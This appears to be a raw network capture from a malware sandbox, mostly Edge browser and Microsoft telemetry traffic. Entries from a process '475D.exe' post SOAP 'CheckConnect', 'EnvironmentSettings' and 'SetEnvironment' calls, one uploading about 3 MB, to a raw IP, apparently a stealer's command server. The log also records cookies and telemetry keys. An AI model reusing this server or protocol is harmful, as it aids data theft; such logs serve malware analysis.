accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604

Response

HTTP/2.0 200

content-type: image/svg+xml
last-modified: Mon, 01 May 2023 22:46:35 GMT
etag: "0x8DB4A95EAB97D55"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0x1lQZAAAAAAFJ1oXoR2OTI/DIjg4nFxbTE9OMjFFREdFMTgxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
content-encoding: gzip
content-length: 542
cache-control: public, max-age=1041
expires: Thu, 12 Oct 2023 21:05:56 GMT
date: Thu, 12 Oct 2023 20:48:35 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: a36a4c94a2c50ff092b38d739ae38554
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0o1soZQAAAADY+0eb+M23SIORBWuFoVZrQlJVMzBFREdFMDcwOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 870
cache-control: public, max-age=43180
expires: Fri, 13 Oct 2023 08:48:15 GMT
date: Thu, 12 Oct 2023 20:48:35 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/favicon.ico

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /favicon.ico HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604

Response

HTTP/2.0 200

content-length: 17174
content-type: image/x-icon
last-modified: Thu, 01 Jun 2023 01:34:23 GMT
etag: "0x8DB6240546D1FAB"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0HO18ZAAAAAD2V0kOsHHARaLs4TlNmskMQU1TMDRFREdFMTgxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=418370
expires: Tue, 17 Oct 2023 17:01:25 GMT
date: Thu, 12 Oct 2023 20:48:35 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
POST

https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

msedge.exe

Remote address:

104.85.2.139:443

Request

POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 153
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
cookie: MSFPC=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143741059

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
access-control-allow-origin: https://learn.microsoft.com
content-encoding: gzip
vary: Origin,Accept-Encoding
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: 7e797fb042c10f033d25a9b40e496eea
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231012T204902Z-c43n5tuxh95592znk9txasfws000000008d0000000005m60
content-length: 870
cache-control: public, max-age=43173
expires: Fri, 13 Oct 2023 08:48:36 GMT
date: Thu, 12 Oct 2023 20:49:03 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
cookie: MSFPC=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178

Response

HTTP/2.0 301

location: /en-us/media/logos/logo_net.svg
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0x1soZQAAAAA/YcKWRgm1RbqMWBo6b8UGQlJVMzBFREdFMTExMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Thu, 12 Oct 2023 20:49:11 GMT
date: Thu, 12 Oct 2023 20:49:11 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
DNS

139.2.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.2.85.104.in-addr.arpa

IN PTR

Response

139.2.85.104.in-addr.arpa

IN PTR

a104-85-2-139deploystaticakamaitechnologiescom
DNS

139.2.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.2.85.104.in-addr.arpa

IN PTR

Response

139.2.85.104.in-addr.arpa

IN PTR

a104-85-2-139deploystaticakamaitechnologiescom
DNS

202.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.28.22.171.in-addr.arpa

IN PTR

Response
DNS

202.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.28.22.171.in-addr.arpa

IN PTR

Response
DNS

65.9.196.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.9.196.185.in-addr.arpa

IN PTR

Response
DNS

65.9.196.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.9.196.185.in-addr.arpa

IN PTR

Response
DNS

wcpstatic.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

wcpstatic.microsoft.com

IN A

Response

wcpstatic.microsoft.com

IN CNAME

consentdeliveryfd.azurefd.net

consentdeliveryfd.azurefd.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
DNS

wcpstatic.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

wcpstatic.microsoft.com

IN A

Response

wcpstatic.microsoft.com

IN CNAME

consentdeliveryfd.azurefd.net

consentdeliveryfd.azurefd.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
DNS

js.monitor.azure.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.monitor.azure.com

IN A

Response

js.monitor.azure.com

IN CNAME

aijscdn2.azureedge.net

aijscdn2.azureedge.net

IN CNAME

aijscdn2.afd.azureedge.net

aijscdn2.afd.azureedge.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
DNS

js.monitor.azure.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.monitor.azure.com

IN A

Response

js.monitor.azure.com

IN CNAME

aijscdn2.azureedge.net

aijscdn2.azureedge.net

IN CNAME

aijscdn2.afd.azureedge.net

aijscdn2.afd.azureedge.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
GET

https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

msedge.exe

Remote address:

13.107.246.67:443

Request

GET /mscc/lib/v2/wcp-consent.js HTTP/2.0
host: wcpstatic.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=43200
content-length: 81726
content-type: application/javascript
content-encoding: gzip
content-md5: X1JOIM5h9UISVFS6+GfEew==
last-modified: Wed, 24 Aug 2022 17:34:36 GMT
age: 40051
etag: 0x8DA85F6EA62BF74
vary: Accept-Encoding
access-control-allow-origin: *
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
x-cache: CONFIG_NOCACHE
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: a07fad4d-401e-0053-5bf0-fc2946000000
x-ms-version: 2009-09-19
x-azure-ref: 0oFsoZQAAAADbHTo/r0TOQI0WeQCqAhGYQlJVMzBFREdFMDQwNwAzOWI0NjE1Ny1jYjllLTQ5YjctYTY1YS04NzIyYTNmODI0ZTQ=
date: Thu, 12 Oct 2023 20:48:32 GMT
POST

http://85.209.176.171/

475D.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 12 Oct 2023 20:48:33 GMT
POST

http://85.209.176.171/

475D.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 12 Oct 2023 20:48:38 GMT
POST

http://85.209.176.171/

475D.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 3151191
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 12 Oct 2023 20:49:27 GMT
DNS

475D.exe

Remote address:

85.209.176.171:80

Response

HTTP/1.1 100 Continue
GET

https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

msedge.exe

Remote address:

13.107.246.67:443

Request

GET /scripts/c/ms.jsll-3.min.js HTTP/2.0
host: js.monitor.azure.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=1800, immutable, no-transform
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: n2Z/y+eaLwpYgTFdIs5bNA==
last-modified: Thu, 21 Sep 2023 19:29:40 GMT
etag: 0x8DBBAD919F17481
x-cache: TCP_HIT
x-ms-request-id: b13d48c5-a01e-00ac-3849-fdaaf4000000
x-ms-version: 2009-09-19
x-ms-meta-jssdkver: 3.2.14
x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.14.min.js
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
x-azure-ref-originshield: 0olUoZQAAAACUN2Gvg1PNToxEwnoV6epcQU1TMDRFREdFMTkwOQBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY=
x-azure-ref: 0oFsoZQAAAAA7TOA61eO8TLcEWcOjd67CQlJVMzBFREdFMDcwNgBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY=
date: Thu, 12 Oct 2023 20:48:32 GMT
DNS

mscom.demdex.net

msedge.exe

Remote address:

8.8.8.8:53

Request

mscom.demdex.net

IN A

Response

mscom.demdex.net

IN CNAME

gslb-2.demdex.net

gslb-2.demdex.net

IN CNAME

edge-irl1.demdex.net

edge-irl1.demdex.net

IN CNAME

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.210.204.82

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

63.34.77.44

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.253.158.202

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.31.123.248

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.255.45.168

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

99.81.14.86

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.255.92.83

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.247.108.36
DNS

mscom.demdex.net

msedge.exe

Remote address:

8.8.8.8:53

Request

mscom.demdex.net

IN A

Response

mscom.demdex.net

IN CNAME

gslb-2.demdex.net

gslb-2.demdex.net

IN CNAME

edge-irl1.demdex.net

edge-irl1.demdex.net

IN CNAME

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.210.204.82

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

63.34.77.44

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.253.158.202

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.31.123.248

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.255.45.168

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

99.81.14.86

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.255.92.83

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.247.108.36
DNS

microsoftmscompoc.tt.omtrdc.net

msedge.exe

Remote address:

8.8.8.8:53

Request

microsoftmscompoc.tt.omtrdc.net

IN A

Response

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.113

adobetarget.data.adobedc.net

IN A

66.235.152.152

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126

adobetarget.data.adobedc.net

IN A

66.235.152.107

adobetarget.data.adobedc.net

IN A

66.235.152.143
DNS

target.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

target.microsoft.com

IN A

Response

target.microsoft.com

IN CNAME

microsoftmscompoc.tt.omtrdc.net

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.152

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126

adobetarget.data.adobedc.net

IN A

66.235.152.107

adobetarget.data.adobedc.net

IN A

66.235.152.143

adobetarget.data.adobedc.net

IN A

66.235.152.113
DNS

67.246.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.246.107.13.in-addr.arpa

IN PTR

Response
DNS

67.246.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.246.107.13.in-addr.arpa

IN PTR

Response
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

238.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.70.216.185.in-addr.arpa

IN PTR

Response
DNS

82.204.210.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

82.204.210.52.in-addr.arpa

IN PTR

Response

82.204.210.52.in-addr.arpa

IN PTR

ec2-52-210-204-82 eu-west-1compute amazonawscom
DNS

api.ip.sb

475D.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/ip

5308.exe

Remote address:

104.26.12.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 12 Oct 2023 20:48:35 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8NCqvPhlcZw12kxt34OQh8DqzJeSyXChNksjvDDpOKZHJqMtUuqAEL8fSOPNLFw5qecnYi9TjKhgLDRGLDuMXeN%2FLakJMWVp8npplSwZOmwDsbbUCIktBsrsVA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8152345d391f65f0-AMS
alt-svc: h3=":443"; ma=86400
DNS

31.12.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.12.26.104.in-addr.arpa

IN PTR

Response
DNS

31.12.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.12.26.104.in-addr.arpa

IN PTR

Response
DNS

browser.events.data.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

browser.events.data.microsoft.com

IN A

Response

browser.events.data.microsoft.com

IN CNAME

browser.events.data.trafficmanager.net

browser.events.data.trafficmanager.net

IN CNAME

onedscolprdcus11.centralus.cloudapp.azure.com

onedscolprdcus11.centralus.cloudapp.azure.com

IN A

104.208.16.89
OPTIONS

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

OPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
accept: */*
access-control-request-method: POST
access-control-request-headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
origin: https://learn.microsoft.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, 3600
content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
access-control-allow-credentials: true
access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
access-control-max-age: 3600
access-control-allow-origin: https://learn.microsoft.com
date: Thu, 12 Oct 2023 20:48:36 GMT
OPTIONS

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

OPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
accept: */*
access-control-request-method: POST
access-control-request-headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
origin: https://learn.microsoft.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, 3600
content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
access-control-allow-credentials: true
access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
access-control-max-age: 3600
access-control-allow-origin: https://learn.microsoft.com
date: Thu, 12 Oct 2023 20:48:40 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

msedge.exe

Remote address:

104.208.16.89:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 3731
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1697143714624
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: use-collector-delta
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 153
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178; Domain=.microsoft.com; Expires=Fri, 11 Oct 2024 20:48:37 GMT; Path=/;Secure; SameSite=None
